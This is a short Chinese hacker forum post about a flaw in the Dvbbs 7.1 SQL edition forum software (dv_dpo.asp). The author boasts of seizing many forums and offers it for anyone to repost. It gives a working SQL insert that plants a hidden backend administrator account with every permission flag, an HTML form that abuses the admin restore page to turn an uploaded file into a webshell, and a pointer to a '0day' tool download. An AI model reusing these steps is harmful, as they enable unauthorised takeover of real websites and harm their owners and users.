反正偶丢出来了。谁爱转就转去吧... 嘿嘿。
据说8月份这个漏洞就出来了 是针对动网7.1SQL版的。 漏洞文件dv_dpo.asp .. 原来只知道是有 但是没想到利用工具都出来了 我拿到的是时候刚好是八月末。
用这个小东西拿了不少动网论坛。 hackest 写文章了..既然他写了偶就给发出来吧。 现在好能拿好些呢 呵呵~~ 不过虽然能在前台将普通用户提升到
管理员 但是加后台的时候这个工具所给的代码是不能用的。 跟本不成功 后来小志给出的是
| 以下是引用片段: insert into dv_admin (username,[password],flag,adduser) values ('7da8373971','323b453885f5181f','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','7da8373971') |
用这个代码才可以加到后台管理员 否则是不能登陆后台的
SQL版拿WEBSHELL方法好象就两个 一个是导出一句话用动网利用工具提交 但是那样备份的目录有的是不可写的
还有一个就是
| 以下是引用片段: <form action="http://论坛地址/admin/data.asp?action=RestoreData&act=Restore"method=post><p> |
已上传的文件位置
| 以下是引用片段: <input name=Dbpath type=text size=80></p><p> |
复制到的位置
| 以下是引用片段: <input name=backpath type=text size=80></p><p><input type=submit value=提交></p></form> |
工具下载: 动网0day